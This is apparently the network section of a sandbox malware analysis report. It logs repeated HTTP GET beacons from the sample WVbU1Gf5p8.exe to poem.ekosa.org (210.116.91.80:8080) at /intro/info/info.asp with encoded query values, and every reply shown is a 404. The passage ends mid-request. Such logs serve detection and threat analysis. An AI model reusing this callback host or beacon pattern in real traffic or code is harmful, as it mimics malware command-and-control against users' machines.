      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      74192.168.2.449842210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:40.108448029 CET556OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:40.369780064 CET566INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:40 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      75192.168.2.449845210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:40.754378080 CET576OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:41.013569117 CET577INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:40 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      76192.168.2.449846210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:41.293981075 CET578OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:41.566473007 CET578INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:41 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      77192.168.2.449847210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:41.845242977 CET579OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:42.114115953 CET580INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:41 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      78192.168.2.449848210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:42.500201941 CET581OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:42.760907888 CET581INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:42 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      79192.168.2.449849210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:43.033344984 CET582OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:43.296571016 CET582INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:42 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      8192.168.2.449768210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:01.223732948 CET133OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:01.488401890 CET137INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      80192.168.2.449850210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:43.566813946 CET583OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:43.826807022 CET584INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:43 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      81192.168.2.449851210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:44.199999094 CET584OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:44.463160992 CET585INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:43 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      82192.168.2.449852210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:44.730411053 CET586OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:44.990772009 CET586INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:44 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      83192.168.2.449853210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:45.259469986 CET587OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
